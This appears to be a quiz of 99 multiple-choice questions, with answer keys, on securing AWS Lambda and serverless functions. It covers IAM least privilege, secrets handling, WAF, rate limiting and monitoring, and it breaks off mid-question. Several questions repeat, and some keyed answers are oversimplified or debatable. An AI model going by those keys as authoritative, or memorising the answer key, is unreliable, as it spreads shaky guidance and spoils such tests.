Serverless Security - Protecting Cloud Functions & Lambda - MCQ

1. What is the primary security concern when using serverless functions like AWS Lambda?

A) Excessive compute costs
B) Long execution times
C) Over-privileged IAM roles
D) Lack of internet connectivity

✅ Answer: C) Over-privileged IAM roles
📌 Explanation: Serverless functions should follow the principle of least privilege to limit access only to necessary resources. Over-privileged IAM roles increase security risks.

2. How can you prevent unauthorized invocation of AWS Lambda functions?

A) Use public API Gateway for all Lambda calls
B) Restrict execution to specific VPCs
C) Set IAM policies with least privilege access
D) Allow unauthenticated users for easier access

✅ Answer: C) Set IAM policies with least privilege access
📌 Explanation: Implementing least privilege IAM policies ensures that only authorized identities can invoke the function, reducing unauthorized access risks.

3. Which type of attack can exploit insecure event triggers in a serverless environment?

A) SQL Injection
B) Server-Side Request Forgery (SSRF)
C) Event Injection
D) DNS Spoofing

✅ Answer: C) Event Injection
📌 Explanation: Event injection attacks occur when an attacker manipulates event sources (e.g., SNS, S3, API Gateway) to trigger malicious behavior in serverless functions.

4. What is a recommended practice for securing environment variables in AWS Lambda?

A) Hardcode secrets in the function code
B) Store secrets in a plaintext file inside the function package
C) Use AWS Secrets Manager or Parameter Store
D) Pass secrets via query parameters in the API request

✅ Answer: C) Use AWS Secrets Manager or Parameter Store
📌 Explanation: AWS Secrets Manager or Parameter Store provides a secure way to store and retrieve sensitive data like API keys, instead of hardcoding them.

5. Which security control helps in detecting malicious activity in AWS Lambda?

A) AWS X-Ray
B) AWS IAM
C) AWS Config
D) AWS CloudTrail & Amazon GuardDuty

✅ Answer: D) AWS CloudTrail & Amazon GuardDuty
📌 Explanation: CloudTrail logs API activity, and GuardDuty detects anomalies and potential threats in AWS Lambda functions.

6. What is a potential risk of allowing AWS Lambda functions to run in a public subnet?

A) Increased cost due to internet traffic
B) Exposure to direct external attacks
C) Slow function execution
D) Limited scalability

✅ Answer: B) Exposure to direct external attacks
📌 Explanation: A public subnet allows unrestricted internet access, increasing the risk of external attacks on the Lambda function.

7. What is the purpose of the AWS Lambda execution role?

A) It defines user access to the AWS Console
B) It grants the Lambda function permissions to interact with AWS resources
C) It determines the Lambda function runtime version
D) It manages the memory and CPU limits

✅ Answer: B) It grants the Lambda function permissions to interact with AWS resources
📌 Explanation: The execution role defines what AWS resources a Lambda function can access, following the least privilege principle.

8. Which attack can occur due to improper validation of user input in serverless applications?

A) Cross-Site Scripting (XSS)
B) Remote Code Execution (RCE)
C) API Gateway Bypass
D) Identity Spoofing

✅ Answer: B) Remote Code Execution (RCE)
📌 Explanation: If input validation is weak, attackers may inject malicious code that gets executed in the function, leading to RCE attacks.

9. How can you reduce the impact of Denial-of-Service (DoS) attacks on AWS Lambda?

A) Increase memory allocation for functions
B) Set concurrency limits and rate limiting
C) Allow unrestricted invocation from API Gateway
D) Enable verbose logging for debugging

✅ Answer: B) Set concurrency limits and rate limiting
📌 Explanation: Setting concurrency limits and using rate limiting mechanisms in API Gateway helps mitigate DoS attacks.

10. Which AWS service helps protect AWS Lambda functions from excessive invocation?

A) AWS IAM
B) AWS Shield
C) AWS WAF
D) AWS Lambda Concurrency Controls

✅ Answer: D) AWS Lambda Concurrency Controls
📌 Explanation: Concurrency controls help manage the number of simultaneous function executions, reducing the risk of excessive invocation.

11. What is a common security risk of serverless applications using external dependencies?

A) Increased function execution time
B) Higher storage requirements
C) Vulnerable third-party libraries
D) Longer cold start times

✅ Answer: C) Vulnerable third-party libraries
📌 Explanation: Third-party libraries may contain security vulnerabilities that attackers can exploit.

12. How can you secure a Lambda function handling sensitive user data?

A) Use encrypted environment variables
B) Store data in plain text for easy retrieval
C) Disable IAM authentication for faster access
D) Allow public read/write permissions on logs

✅ Answer: A) Use encrypted environment variables
📌 Explanation: Encrypting environment variables prevents unauthorized access to sensitive data.

13. What is the role of AWS WAF in serverless security?

A) Filtering malicious requests before they reach API Gateway
B) Encrypting data stored in Lambda functions
C) Managing IAM permissions for Lambda
D) Preventing unauthorized SSH access

✅ Answer: A) Filtering malicious requests before they reach API Gateway
📌 Explanation: AWS WAF helps filter SQLi, XSS, and other attacks at the API Gateway level before they reach serverless functions.

14. Which of the following improves the security of AWS Lambda layers?

A) Using only publicly available layers
B) Keeping layers updated with security patches
C) Using hardcoded credentials in layers
D) Disabling encryption on layers

✅ Answer: B) Keeping layers updated with security patches
📌 Explanation: Keeping Lambda layers updated ensures that known vulnerabilities are patched.

15. What is a key risk of deploying AWS Lambda functions in a shared cloud environment?

A) Cross-tenant data leakage
B) High memory usage
C) Slow execution times
D) Higher billing rates

✅ Answer: A) Cross-tenant data leakage
📌 Explanation: Multi-tenancy in cloud environments can lead to cross-tenant data leakage if isolation mechanisms fail.

16. Which logging service can help identify security incidents in AWS Lambda?

A) Amazon CloudWatch
B) AWS CodePipeline
C) AWS CodeDeploy
D) AWS Auto Scaling

✅ Answer: A) Amazon CloudWatch
📌 Explanation: CloudWatch logs Lambda execution data, helping detect anomalies and security incidents.

17. Which security risk is associated with misconfigured CORS in serverless applications?

A) Information Disclosure
B) Memory Leakage
C) High Execution Time
D) CPU Exhaustion

✅ Answer: A) Information Disclosure
📌 Explanation: Misconfigured CORS can allow unauthorized access to sensitive APIs, leading to data exposure.

18. What should be avoided when handling secrets in AWS Lambda?

A) Using environment variables
B) Storing secrets in the function code
C) Encrypting secrets with KMS
D) Using IAM roles for access control

✅ Answer: B) Storing secrets in the function code
📌 Explanation: Never store secrets directly in code, as they could be leaked if the code is exposed.

19. How can you restrict AWS Lambda function access to a specific IP range?

A) Using AWS Shield
B) Configuring API Gateway with an IP whitelist
C) Setting up a Lambda Layer
D) Encrypting the function code

✅ Answer: B) Configuring API Gateway with an IP whitelist
📌 Explanation: API Gateway allows IP-based access control through resource policies, blocking unauthorized IPs from invoking Lambda.

20. What is the best approach to ensure serverless applications are protected against dependency vulnerabilities?

A) Use only open-source libraries
B) Regularly scan dependencies for vulnerabilities
C) Hardcode dependencies in Lambda
D) Avoid updating dependencies for stability

✅ Answer: B) Regularly scan dependencies for vulnerabilities
📌 Explanation: Use tools like AWS CodeGuru, Snyk, or OWASP Dependency-Check to detect vulnerabilities in serverless dependencies.

21. What happens if a Lambda function is exposed to unrestricted public HTTP access?

A) The function execution speed increases
B) It becomes vulnerable to brute-force and API abuse attacks
C) The function’s cost reduces
D) AWS automatically protects it

✅ Answer: B) It becomes vulnerable to brute-force and API abuse attacks
📌 Explanation: Publicly accessible Lambda functions via API Gateway can be targeted for brute-force, DDoS, and API abuse attacks.

22. How can AWS Identity Federation improve Lambda security?

A) By allowing anonymous access
B) By integrating external authentication sources (e.g., SAML, OIDC)
C) By removing IAM permissions
D) By increasing Lambda execution time

✅ Answer: B) By integrating external authentication sources (e.g., SAML, OIDC)
📌 Explanation: AWS Identity Federation allows secure authentication via SAML, OIDC, or Cognito, reducing direct IAM exposure.

23. Which security measure protects AWS Lambda from excessive retries and recursive invocations?

A) Setting Dead Letter Queues (DLQ)
B) Increasing memory allocation
C) Hardcoding function timeouts
D) Using an unscoped IAM role

✅ Answer: A) Setting Dead Letter Queues (DLQ)
📌 Explanation: DLQs help prevent infinite retry loops by capturing failed execution requests instead of triggering them endlessly.

24. What is a key risk of using inline policies for Lambda IAM roles?

A) They cannot be modified after creation
B) They expose credentials to unauthorized users
C) They may grant excessive permissions unintentionally
D) They reduce function execution time

✅ Answer: C) They may grant excessive permissions unintentionally
📌 Explanation: Inline IAM policies are harder to manage and often lack granularity, leading to over-permissioned roles.

25. What should be done to prevent code injection attacks in serverless applications?

A) Use managed runtime environments
B) Enable X-Ray tracing in AWS Lambda
C) Validate and sanitize user input
D) Increase timeout settings

✅ Answer: C) Validate and sanitize user input
📌 Explanation: Unvalidated input can lead to code injection vulnerabilities, such as RCE and SQL injection.

26. How can attackers exploit an overly permissive Lambda IAM role?

A) By triggering a function repeatedly
B) By exfiltrating sensitive data from AWS resources
C) By increasing execution time
D) By modifying the Lambda timeout setting

✅ Answer: B) By exfiltrating sensitive data from AWS resources
📌 Explanation: Overly permissive IAM roles allow attackers to access S3, DynamoDB, or secrets, leading to data breaches.

27. Which AWS service helps prevent unauthorized access to AWS Lambda functions?

A) AWS Shield
B) AWS IAM and Resource Policies
C) AWS Trusted Advisor
D) Amazon Route 53

✅ Answer: B) AWS IAM and Resource Policies
📌 Explanation: IAM policies and resource policies enforce strict access control on who can invoke Lambda functions.

28. What is the recommended way to protect serverless functions from privilege escalation?

A) Avoid assigning IAM policies to Lambda functions
B) Use restrictive IAM roles and follow the least privilege principle
C) Use Lambda to manage IAM roles dynamically
D) Set up unrestricted network access for Lambda

✅ Answer: B) Use restrictive IAM roles and follow the least privilege principle
📌 Explanation: Overly permissive IAM policies allow attackers to escalate privileges and gain unauthorized access.

29. Why is logging sensitive data in AWS Lambda a security risk?

A) Logs may be stored for too long
B) AWS automatically deletes logs
C) Logs are publicly visible by default
D) Logs can be accessed by unauthorized users if misconfigured

✅ Answer: D) Logs can be accessed by unauthorized users if misconfigured
📌 Explanation: Logging secrets, credentials, or PII in CloudWatch can expose sensitive data if permissions are weak.

30. What is a risk of using default execution roles in AWS Lambda?

A) They have unnecessary permissions
B) They improve function security
C) They enhance debugging capabilities
D) They speed up function execution

✅ Answer: A) They have unnecessary permissions
📌 Explanation: Default roles may include permissions beyond what is necessary, violating least privilege principles.

31. Which AWS service helps detect anomalies in Lambda activity?

A) AWS Glue
B) AWS GuardDuty
C) Amazon SNS
D) AWS CodeBuild

✅ Answer: B) AWS GuardDuty
📌 Explanation: GuardDuty detects suspicious activity in AWS Lambda, such as unauthorized API calls and privilege escalation.

32. How can AWS Lambda function execution time impact security?

A) Longer execution time increases attack surface
B) Short execution times make functions insecure
C) Execution time does not affect security
D) AWS automatically limits execution time

✅ Answer: A) Longer execution time increases attack surface
📌 Explanation: Longer execution times can lead to higher attack exposure, especially if attackers attempt brute-force or DoS attacks.

33. How can you protect a Lambda function from unauthorized API Gateway calls?

A) Enable AWS WAF on API Gateway
B) Increase timeout limits
C) Disable IAM authentication
D) Use a publicly accessible VPC

✅ Answer: A) Enable AWS WAF on API Gateway
📌 Explanation: AWS WAF blocks malicious requests before they reach Lambda.

34. What is the impact of improper error handling in AWS Lambda?

A) Sensitive data leakage through error messages
B) Faster function execution
C) Improved user experience
D) Reduced cost

✅ Answer: A) Sensitive data leakage through error messages
📌 Explanation: Detailed error messages can expose stack traces, secrets, and sensitive logic, aiding attackers.

35. How can you protect Lambda functions against replay attacks?

A) Use time-based tokens and nonce values
B) Hardcode function responses
C) Increase function timeout
D) Store API keys in environment variables

✅ Answer: A) Use time-based tokens and nonce values
📌 Explanation: Nonce values and time-based tokens ensure each request is unique, preventing replay attacks.

36. What is a key security best practice for serverless applications handling financial transactions?

A) Enable logging and monitoring
B) Allow unrestricted public access
C) Reduce function memory allocation
D) Increase function concurrency

✅ Answer: A) Enable logging and monitoring
📌 Explanation: Logging and monitoring detect anomalous transactions and potential fraud.

37. What is the best way to prevent excessive permissions when granting Lambda access to an S3 bucket?

A) Grant full S3 access (s3:*) to the function
B) Use fine-grained IAM policies with specific S3 actions
C) Add the Lambda function to the AdministratorAccess policy
D) Store the AWS credentials in environment variables

✅ Answer: B) Use fine-grained IAM policies with specific S3 actions
📌 Explanation: Following least privilege principles, IAM policies should grant only required S3 actions instead of full access.

38. How can you protect an AWS Lambda function from cross-account access?

A) Use AWS Shield Advanced
B) Restrict access with resource-based policies
C) Increase function execution timeout
D) Use a publicly accessible Lambda layer

✅ Answer: B) Restrict access with resource-based policies
📌 Explanation: Resource-based policies can be applied to restrict specific AWS accounts from invoking a Lambda function.

39. What is a security concern of keeping AWS Lambda functions in a public subnet?

A) Increased storage cost
B) More accessible to public internet threats
C) Reduced function execution time
D) Enhanced network performance

✅ Answer: B) More accessible to public internet threats
📌 Explanation: Public subnets expose Lambda functions to direct attacks, increasing risks like SSRF, open database exposure, and malware injection.

40. How can you prevent a Lambda function from accessing resources outside its intended scope?

A) Use a broad IAM policy for flexibility
B) Implement a strict IAM role with minimal permissions
C) Allow all VPC traffic for unrestricted access
D) Store AWS credentials in plaintext

✅ Answer: B) Implement a strict IAM role with minimal permissions
📌 Explanation: Restrictive IAM roles ensure the function can access only necessary AWS resources, reducing the attack surface.

41. What is the risk of using a single execution role across multiple Lambda functions?

A) Increased billing costs
B) Potential privilege escalation across functions
C) Improved function performance
D) Reduced network latency

✅ Answer: B) Potential privilege escalation across functions
📌 Explanation: If multiple functions share the same IAM role, an attacker compromising one function might gain access to unintended resources.

42. Why should you avoid exposing Lambda function URLs directly?

A) They make debugging harder
B) They increase unauthorized access risk
C) AWS automatically blocks direct access
D) They reduce function execution time

✅ Answer: B) They increase unauthorized access risk
📌 Explanation: Directly exposed Lambda URLs can be brute-forced, exploited, or abused, leading to unauthorized API calls.

43. How can you minimize the security risk of long-lived AWS credentials in Lambda?

A) Store credentials inside the function code
B) Use IAM roles with temporary credentials
C) Use plaintext secrets in API Gateway
D) Hardcode access keys inside the function

✅ Answer: B) Use IAM roles with temporary credentials
📌 Explanation: IAM roles provide temporary credentials, preventing long-term exposure of static credentials.

44. How can attackers exploit misconfigured CloudWatch logs in Lambda?

A) By increasing Lambda timeout settings
B) By retrieving sensitive data from log outputs
C) By injecting malicious code into logs
D) By preventing function execution

✅ Answer: B) By retrieving sensitive data from log outputs
📌 Explanation: Misconfigured logs may expose secrets, API keys, and sensitive data, aiding attackers in further exploitation.

45. What is the best way to secure API Gateway endpoints linked to AWS Lambda?

A) Enable AWS WAF for input validation
B) Use public API Gateway routes
C) Allow unrestricted access to API Gateway
D) Store API keys inside the function code

✅ Answer: A) Enable AWS WAF for input validation
📌 Explanation: AWS WAF helps block SQLi, XSS, and other web-based attacks before they reach Lambda.

46. What security risk does an unbounded loop in an AWS Lambda function introduce?

A) Potential Denial of Service (DoS)
B) Reduced function execution cost
C) Improved response time
D) Increased memory allocation

✅ Answer: A) Potential Denial of Service (DoS)
📌 Explanation: Unbounded loops can cause infinite execution, leading to resource exhaustion and higher costs.

47. How can you prevent sensitive data exposure in Lambda responses?

A) Encrypt responses using AWS KMS
B) Store secrets in the function logs
C) Allow unrestricted logging
D) Include full error messages in responses

✅ Answer: A) Encrypt responses using AWS KMS
📌 Explanation: AWS KMS encryption ensures sensitive data is protected before being sent in API responses.

48. Why should you regularly update AWS Lambda dependencies?

A) To improve function runtime performance
B) To patch security vulnerabilities in third-party packages
C) To avoid AWS billing increases
D) To reduce execution time

✅ Answer: B) To patch security vulnerabilities in third-party packages
📌 Explanation: Outdated dependencies can contain known exploits, which attackers can leverage for remote code execution.

49. What is a security benefit of using AWS Lambda layers?

A) It reduces function execution time
B) It allows centralized dependency management and security updates
C) It provides publicly accessible function code
D) It automatically secures runtime environments

✅ Answer: B) It allows centralized dependency management and security updates
📌 Explanation: Lambda layers help manage dependencies separately from function code, allowing easier security patching.

50. How can you prevent API abuse and bot attacks against Lambda functions?

A) Enable rate limiting and authentication mechanisms
B) Store sensitive data in public S3 buckets
C) Allow unrestricted API calls
D) Remove IAM roles for easier access

✅ Answer: A) Enable rate limiting and authentication mechanisms
📌 Explanation: Rate limiting (AWS WAF, API Gateway throttling) and authentication (JWT, OAuth) help prevent abuse and automated attacks.

51. What is the primary purpose of AWS Lambda’s execution role?

A) It defines user permissions to access the AWS console
B) It grants the Lambda function necessary permissions to interact with AWS resources
C) It improves the function execution speed
D) It determines the Lambda function memory allocation

✅ Answer: B) It grants the Lambda function necessary permissions to interact with AWS resources
📌 Explanation: The execution role ensures that Lambda has only the required permissions to access AWS services, enforcing the least privilege principle.

52. What is a key security concern when using external APIs in a Lambda function?

A) Increased execution time
B) Insecure API responses leading to data exposure
C) Higher AWS costs
D) Reduced cold start time

✅ Answer: B) Insecure API responses leading to data exposure
📌 Explanation: External APIs may return sensitive data, which, if not properly validated or secured, could be leaked or exploited.

53. Which AWS security feature can be used to encrypt data at rest in AWS Lambda?

A) AWS CloudTrail
B) AWS KMS (Key Management Service)
C) AWS X-Ray
D) AWS IAM

✅ Answer: B) AWS KMS (Key Management Service)
📌 Explanation: AWS KMS enables encryption and decryption of sensitive data, ensuring secure storage and processing.

54. How can attackers exploit insecure environment variables in AWS Lambda?

A) By modifying function execution time
B) By accessing hardcoded secrets or credentials
C) By increasing API response speed
D) By reducing Lambda function concurrency

✅ Answer: B) By accessing hardcoded secrets or credentials
📌 Explanation: Storing unencrypted secrets in environment variables exposes them to attackers, leading to data breaches.

55. How can AWS Config improve security for serverless applications?

A) By tracking configuration changes and detecting misconfigurations
B) By reducing execution time for Lambda functions
C) By increasing function concurrency
D) By blocking all inbound traffic

✅ Answer: A) By tracking configuration changes and detecting misconfigurations
📌 Explanation: AWS Config monitors configuration changes and helps detect non-compliant settings that might expose security risks.

56. What is a common security risk when using an API Gateway with AWS Lambda?

A) Lambda function timeouts
B) Lack of authentication and authorization controls
C) Increased latency
D) Higher AWS billing

✅ Answer: B) Lack of authentication and authorization controls
📌 Explanation: If API Gateway doesn’t enforce IAM, OAuth, or API keys, attackers may invoke Lambda functions without authorization.

57. What type of attack can occur if a Lambda function is not validated before processing events from untrusted sources?

A) Cross-Site Scripting (XSS)
B) Event Injection Attack
C) Man-in-the-Middle (MITM)
D) Brute Force

✅ Answer: B) Event Injection Attack
📌 Explanation: Attackers can manipulate event data (SNS, S3, API Gateway) to inject malicious payloads if proper validation isn’t performed.

58. How can you limit the number of concurrent executions of an AWS Lambda function?

A) By configuring reserved concurrency limits
B) By enabling verbose logging
C) By disabling IAM authentication
D) By using AWS Secrets Manager

✅ Answer: A) By configuring reserved concurrency limits
📌 Explanation: Reserved concurrency limits protect Lambda from overuse or DoS attacks by restricting simultaneous function executions.

59. What is the recommended method to store API keys in AWS Lambda securely?

A) Store them in plaintext inside the function code
B) Use AWS Secrets Manager or Parameter Store
C) Pass them as query parameters in API requests
D) Hardcode them inside environment variables

✅ Answer: B) Use AWS Secrets Manager or Parameter Store
📌 Explanation: Secrets Manager and Parameter Store securely manage API keys, preventing unauthorized access and leakage.

60. How can improper CORS configuration affect a serverless API?

A) It allows unauthorized cross-origin requests
B) It improves function execution speed
C) It increases API Gateway costs
D) It prevents authentication failures

✅ Answer: A) It allows unauthorized cross-origin requests
📌 Explanation: Misconfigured CORS policies can expose serverless APIs to cross-origin attacks, leading to unauthorized access.

61. Why should IAM policies follow the principle of least privilege for Lambda?

A) To minimize the risk of privilege escalation
B) To improve function execution time
C) To reduce AWS costs
D) To enable unrestricted resource access

✅ Answer: A) To minimize the risk of privilege escalation
📌 Explanation: Restricting IAM permissions ensures that Lambda only accesses required resources, reducing security risks.

62. How can you prevent malicious API requests from reaching AWS Lambda?

A) By enabling AWS WAF
B) By increasing function timeout
C) By allowing unrestricted public API access
D) By storing sensitive data in logs

✅ Answer: A) By enabling AWS WAF
📌 Explanation: AWS WAF filters out malicious traffic, protecting Lambda from SQL injection, XSS, and API abuse attacks.

63. What is a key risk of using a publicly accessible AWS Lambda function URL?

A) Increased execution time
B) Unauthorized access and API abuse
C) Reduced cold start issues
D) Increased function concurrency

✅ Answer: B) Unauthorized access and API abuse
📌 Explanation: Public URLs allow unauthorized users to invoke Lambda functions, increasing the risk of API abuse and attacks.

64. How can attackers exploit insecure S3 triggers in serverless applications?

A) By modifying function execution time
B) By injecting malicious files into S3 events
C) By reducing storage costs
D) By increasing API latency

✅ Answer: B) By injecting malicious files into S3 events
📌 Explanation: Unvalidated S3 triggers can allow attackers to upload malicious payloads, leading to data exfiltration or function compromise.

65. What security measure helps protect Lambda from brute-force attacks?

A) Rate limiting via API Gateway
B) Increasing function memory allocation
C) Removing IAM authentication
D) Allowing unrestricted CORS access

✅ Answer: A) Rate limiting via API Gateway
📌 Explanation: Rate limiting prevents excessive requests that could be part of a brute-force or DoS attack.

66. Why should Lambda function execution logs be properly restricted?

A) To reduce AWS billing costs
B) To prevent sensitive data leakage
C) To improve debugging speed
D) To increase API response time

✅ Answer: B) To prevent sensitive data leakage
📌 Explanation: Improperly configured logs can expose secrets, PII, or API keys, leading to security breaches.

67. What is the risk of not defining timeouts for a Lambda function?

A) Increased risk of resource exhaustion
B) Reduced API Gateway integration
C) Lower execution concurrency
D) AWS will automatically handle long-running functions

✅ Answer: A) Increased risk of resource exhaustion
📌 Explanation: Without timeouts, Lambda functions may run indefinitely, leading to DoS attacks and cost spikes.

68. How can AWS CloudTrail improve Lambda security?

A) By logging API activity and detecting anomalies
B) By increasing function memory
C) By improving execution time
D) By automatically patching vulnerabilities

✅ Answer: A) By logging API activity and detecting anomalies
📌 Explanation: CloudTrail logs AWS API events, helping detect unauthorized access or privilege escalation.

69. What is a key benefit of using Amazon GuardDuty for Lambda security?

A) Detecting threats and suspicious behavior
B) Increasing function execution speed
C) Reducing function cold starts
D) Allowing public API access

✅ Answer: A) Detecting threats and suspicious behavior
📌 Explanation: GuardDuty monitors AWS accounts for malicious activity related to Lambda functions.

70. What should you avoid when handling errors in AWS Lambda?

A) Exposing detailed error messages to users
B) Logging errors for debugging
C) Implementing retry mechanisms
D) Using dead-letter queues

✅ Answer: A) Exposing detailed error messages to users
📌 Explanation: Error messages should not reveal sensitive data, as attackers can use them for information disclosure attacks.

71. Which AWS service can help automate security best practices for AWS Lambda?

A) AWS Trusted Advisor
B) Amazon CloudFront
C) AWS Auto Scaling
D) AWS Lambda Layers

✅ Answer: A) AWS Trusted Advisor
📌 Explanation: AWS Trusted Advisor helps identify security risks in Lambda, such as over-privileged IAM roles and missing security configurations.

72. What is the main security concern when using AWS Lambda with public API Gateway endpoints?

A) Increased AWS costs
B) Unauthorized access and API abuse
C) Faster function execution
D) Lower request latency

✅ Answer: B) Unauthorized access and API abuse
📌 Explanation: Publicly accessible API Gateway endpoints allow attackers to brute-force or exploit the Lambda function.

73. What is a key advantage of using an AWS Lambda authorizer with API Gateway?

A) It provides authentication and authorization before requests reach the Lambda function
B) It increases function execution speed
C) It enables AWS WAF automatically
D) It disables API Gateway logging

✅ Answer: A) It provides authentication and authorization before requests reach the Lambda function
📌 Explanation: Lambda authorizers allow token-based authentication (JWT, OAuth) before API requests are processed by Lambda.

74. How can AWS Lambda functions be protected from excessive retries?

A) Implement exponential backoff in API clients
B) Disable IAM authentication
C) Increase function execution time
D) Allow unrestricted event retries

✅ Answer: A) Implement exponential backoff in API clients
📌 Explanation: Exponential backoff helps prevent API abuse and excessive invocation loops, reducing Lambda execution retries.

75. What is a risk of storing sensitive data in unencrypted environment variables?

A) Unauthorized access if the function is compromised
B) Increased function execution latency
C) Reduced API Gateway logging
D) Slower database queries

✅ Answer: A) Unauthorized access if the function is compromised
📌 Explanation: If attackers gain access to the function, they can extract secrets from environment variables, leading to data breaches.

76. What is a key security feature of AWS Key Management Service (KMS) in Lambda?

A) Secure encryption and decryption of sensitive data
B) Improved function execution time
C) Automated role assignment
D) Enabling public API access

✅ Answer: A) Secure encryption and decryption of sensitive data
📌 Explanation: AWS KMS ensures sensitive data is encrypted and securely retrieved, preventing data leaks.

77. Which AWS feature can be used to detect unusual behavior in AWS Lambda?

A) Amazon GuardDuty
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS X-Ray

✅ Answer: A) Amazon GuardDuty
📌 Explanation: GuardDuty detects suspicious activity in AWS Lambda, such as unauthorized access and privilege escalation.

78. How can you ensure Lambda functions execute only from specific AWS accounts?

A) Use resource-based policies to allow only specific AWS account IDs
B) Increase function execution memory
C) Reduce function concurrency
D) Store AWS credentials in plaintext

✅ Answer: A) Use resource-based policies to allow only specific AWS account IDs
📌 Explanation: Resource-based policies restrict which AWS accounts can invoke a Lambda function, preventing unauthorized access.

79. What is a recommended security measure when using third-party dependencies in AWS Lambda?

A) Regularly scan dependencies for vulnerabilities
B) Store dependencies in plaintext files
C) Hardcode dependencies in the function
D) Allow all dependencies without verification

✅ Answer: A) Regularly scan dependencies for vulnerabilities
📌 Explanation: Dependency scanning detects security vulnerabilities in third-party packages, preventing potential exploits.

80. How can AWS Lambda functions be protected from API scraping attacks?

A) Enable rate limiting in API Gateway
B) Disable IAM authentication
C) Store API responses in logs
D) Allow unrestricted public API access

✅ Answer: A) Enable rate limiting in API Gateway
📌 Explanation: Rate limiting prevents API scraping and abuse, blocking excessive requests from bots or attackers.

81. What should be avoided when configuring AWS Lambda logging?

A) Logging sensitive data such as API keys
B) Enabling CloudWatch Logs for monitoring
C) Using structured logs for debugging
D) Implementing log retention policies

✅ Answer: A) Logging sensitive data such as API keys
📌 Explanation: Logging secrets, API keys, or PII increases the risk of data leaks if logs are compromised.

82. What is the impact of allowing unrestricted network access to AWS Lambda?

A) Increased exposure to external threats
B) Faster function execution
C) Lower AWS billing
D) Improved API Gateway performance

✅ Answer: A) Increased exposure to external threats
📌 Explanation: Unrestricted network access makes Lambda functions vulnerable to network-based attacks like SSRF and DDoS.

83. What is a best practice for securing AWS Lambda function permissions?

A) Assign the function the least privilege IAM role
B) Use the AWS AdministratorAccess policy
C) Allow full access to all AWS resources
D) Store IAM credentials in the function code

✅ Answer: A) Assign the function the least privilege IAM role
📌 Explanation: Least privilege IAM roles reduce security risks by granting only necessary permissions.

84. What is a risk of not setting concurrency limits on AWS Lambda?

A) Functions may consume excessive AWS resources
B) Lambda functions execute faster
C) Reduced API Gateway latency
D) Lower execution costs

✅ Answer: A) Functions may consume excessive AWS resources
📌 Explanation: Unlimited concurrency can lead to resource exhaustion, increasing costs and enabling Denial-of-Service (DoS) attacks.

85. How can you prevent unauthorized external API calls in AWS Lambda?

A) Restrict outbound network traffic using VPC security groups
B) Increase function execution time
C) Allow unrestricted API Gateway access
D) Store API keys in function logs

✅ Answer: A) Restrict outbound network traffic using VPC security groups
📌 Explanation: VPC security groups can block unauthorized outbound traffic, preventing data exfiltration.

86. What security risk arises from using hardcoded API keys in Lambda functions?

A) Keys may be leaked if the code is exposed
B) Improved function execution time
C) Reduced AWS billing
D) Increased IAM security

✅ Answer: A) Keys may be leaked if the code is exposed
📌 Explanation: Hardcoded API keys can be exposed in code repositories or logs, leading to unauthorized API access.

87. How does AWS WAF help protect AWS Lambda functions?

A) By filtering malicious requests before they reach API Gateway
B) By increasing Lambda execution speed
C) By improving IAM role management
D) By automatically enabling public API access

✅ Answer: A) By filtering malicious requests before they reach API Gateway
📌 Explanation: AWS WAF blocks SQL injection, XSS, and API abuse attacks, protecting Lambda from malicious traffic.

88. What is a potential impact of enabling debug logging in AWS Lambda production environments?

A) Exposure of sensitive information
B) Reduced function execution latency
C) Faster debugging and error resolution
D) Improved IAM security

✅ Answer: A) Exposure of sensitive information
📌 Explanation: Debug logs may contain sensitive data, which attackers can exploit for information disclosure.

89. How can you prevent attackers from modifying AWS Lambda configurations?

A) Enable AWS IAM role-based access control (RBAC)
B) Allow all users to edit function settings
C) Store AWS credentials inside the function
D) Increase function execution timeout

✅ Answer: A) Enable AWS IAM role-based access control (RBAC)
📌 Explanation: RBAC ensures only authorized users can modify Lambda function configurations.

90. How can AWS CloudTrail enhance security in serverless applications?

A) By logging all API activity for audit and compliance
B) By reducing function cold starts
C) By increasing IAM permissions
D) By improving function concurrency

✅ Answer: A) By logging all API activity for audit and compliance
📌 Explanation: CloudTrail logs help detect unauthorized access, privilege escalation, and security incidents.

91. What is the primary risk of using publicly accessible Lambda function URLs?

A) Increased response time
B) Unauthenticated invocation leading to abuse
C) Lower AWS billing
D) Improved debugging capabilities

✅ Answer: B) Unauthenticated invocation leading to abuse
📌 Explanation: Public Lambda URLs without authentication can be exploited for brute force, API abuse, and denial-of-service (DoS) attacks.

92. How can AWS Lambda functions be protected from API gateway injection attacks?

A) Enable AWS WAF with input validation rules
B) Increase function memory allocation
C) Disable IAM authentication
D) Allow unrestricted API access

✅ Answer: A) Enable AWS WAF with input validation rules
📌 Explanation: AWS WAF blocks malicious API input, preventing injection attacks (SQLi, XSS, and command injection).

93. What security risk arises from unrestricted cross-account access to AWS Lambda functions?

A) Unauthorized access and privilege escalation
B) Lower function execution time
C) Reduced logging visibility
D) Increased API response speed

✅ Answer: A) Unauthorized access and privilege escalation
📌 Explanation: Cross-account access should be restricted to prevent external AWS accounts from modifying or invoking Lambda functions.

94. Which AWS security service helps detect anomalous behavior in AWS Lambda?

A) AWS GuardDuty
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS Route 53

✅ Answer: A) AWS GuardDuty
📌 Explanation: GuardDuty detects unusual behavior, such as unexpected API calls and privilege escalation attempts.

95. How can you protect AWS Lambda against privilege escalation attacks?

A) Apply strict IAM policies with the least privilege principle
B) Grant full AdministratorAccess to Lambda functions
C) Disable CloudTrail logging
D) Allow unrestricted VPC access

✅ Answer: A) Apply strict IAM policies with the least privilege principle
📌 Explanation: Restrictive IAM policies ensure that Lambda functions don’t have excessive permissions that attackers can exploit.

96. What is the role of API Gateway in securing AWS Lambda functions?

A) It filters and authenticates incoming requests before they reach Lambda
B) It speeds up function execution
C) It enables unrestricted public access
D) It increases Lambda execution time

✅ Answer: A) It filters and authenticates incoming requests before they reach Lambda
📌 Explanation: API Gateway helps validate, authenticate, and filter requests, preventing direct attacks on AWS Lambda.

97. How can AWS CloudWatch Logs enhance Lambda security?

A) By tracking function execution logs and detecting anomalies
B) By reducing function execution time
C) By increasing IAM permissions
D) By disabling API Gateway logging

✅ Answer: A) By tracking function execution logs and detecting anomalies
📌 Explanation: CloudWatch Logs help detect unusual activity, errors, or unauthorized access attempts in Lambda functions.

98. What security risk does an unpatched AWS Lambda function pose?

A) Exposure to known vulnerabilities and exploits
B) Lower function execution costs
C) Faster API response time
D) Reduced memory consumption

✅ Answer: A) Exposure to known vulnerabilities and exploits
📌 Explanation: Unpatched Lambda runtimes or dependencies can expose functions to known security vulnerabilities.

99. What is a security benefit of using AWS Lambda layers?

A) It allows centralized dependency management and updates
B) It speeds up function execution
